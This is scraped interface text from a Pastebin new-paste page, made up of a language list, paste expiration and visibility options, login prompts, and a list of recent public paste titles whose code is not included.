Rexx
Robots
Roff Manpage
Ruby
Ruby Gnuplot
Rust
SAS
SCL
SPARK
SPARQL
SQF
SQL
SSH Config
Scala
Scheme
Scilab
SdlBasic
Smalltalk
Smarty
StandardML
StoneScript
SuperCollider
Swift
SystemVerilog
T-SQL
TCL
TeXgraph
Tera Term
TypeScript
TypoScript
UPC
Unicon
UnrealScript
Urbi
VB.NET
VBScript
VHDL
VIM
Vala
Vedit
VeriLog
Visual Pro Log
VisualBasic
VisualFoxPro
WHOIS
WhiteSpace
Winbatch
XBasic
XML
XPP
Xojo
Xorg Config
YAML
YARA
Z80 Assembler
ZXBasic
autoconf
jQuery
mIRC
newLISP
q/kdb+
thinBasic
Paste Expiration:
Never
Burn after read
10 Minutes
1 Hour
1 Day
1 Week
2 Weeks
1 Month
6 Months
1 Year
Paste Exposure:
Public
Unlisted
Private
Folder:
(members only)
Password
NEW
Enabled
Disabled
Burn after read
NEW
Paste Name / Title:
Create New Paste
Hello
Guest
Sign Up
or
Login
Sign in with Facebook
Sign in with Twitter
Sign in with Google
You are currently not logged in, this means you can not edit or delete anything you paste.
Sign Up
or
Login
Public Pastes
blink_attack.py
Python | 52 min ago | 2.98 KB
TAP
JavaScript | 11 hours ago | 10.69 KB
shell.php
PHP | 16 hours ago | 5.56 KB
IT & AI
1 day ago | 0.09 KB
my scers
1 day ago | 0.15 KB
Baccano!
2 days ago | 1.97 KB
TLOZ Windwaker - Windfall Island - Virtual Pi...
2 days ago | 1.57 KB
squar
2 days ago | 0.10 KB
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the
Cookies Policy
.
OK, I Understand
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!
